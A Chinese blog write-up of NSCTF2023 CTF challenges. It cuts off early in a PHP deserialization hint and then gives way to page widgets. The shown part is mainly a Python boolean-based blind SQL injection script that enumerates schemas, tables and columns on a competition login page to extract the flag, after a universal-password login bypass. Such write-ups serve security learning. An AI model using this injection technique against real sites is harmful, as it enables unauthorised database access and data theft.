第六届宁波市赛 [NSCTF2023] 部分web+部分misc+部分密码+mobile

文章详细介绍了多个CTF挑战的解决方案,包括Web安全中的SQL布尔盲注获取flag,PHP反序列化漏洞利用,以及加密解密问题,如RSA和摩斯密码、维吉尼亚密码的破解。此外,还涉及ZIP压缩包的字典爆破和PDF文档的转换处理。

前言

只有web,misc是我写的,剩下的都是队的师傅写的,我是飞舞,就这样

Web

Query

查看源码有hintlogin.php,然后有显示登录界面

image-20230520153206872

利用万能密码进行登录,有回显
image-20230520153637646

回显是登陆成功利用脚本进行布尔盲注

import requests
import string

url="http://d574c221d2a0f4da.node.nsctf.cn/login.php"
s=string.ascii_letters+string.digits
flag=''
for i in range(1,999):
    print(i)
    for j in range(32,128):

        # 库名
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(schema_name)/**/from/**/information_schema.schemata),{i},1))/**/like/**/{j},1,0)#"

        # 表名
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'ctf'),{i},1))/**/like/**/{j},1,0)#"

        # 列名
        #s = f"-1'/**/or/**/if(ascii(substr((select/**/group_concat(column_name)frOm/**/information_schema.columns/**/where/**/table_name/**/like/**/'f111'),{i},1))/**/like/**/{j},1,0)#"

        s = f"-1'/**/or/**/if(ord(substr((select/**/group_concat(flagdata)/**/from/**/ctf.f111),{
     
     i},1))/**/like/**/{
     
     j},1,0)#"

        data={
   
   
            'username':s,
            'password':1
        }

        r=requests.post(url,data=data)
        if "登录成功" in r.text:
            flag+=chr(j)
            print(flag)
            break

运行脚本得出flag

image-20230520154409436

Deserialization

按f12得到hint

//The location of the flag is at route.php
$read = $_POST["read"];
$input = $_POST</
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leafzzz__

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值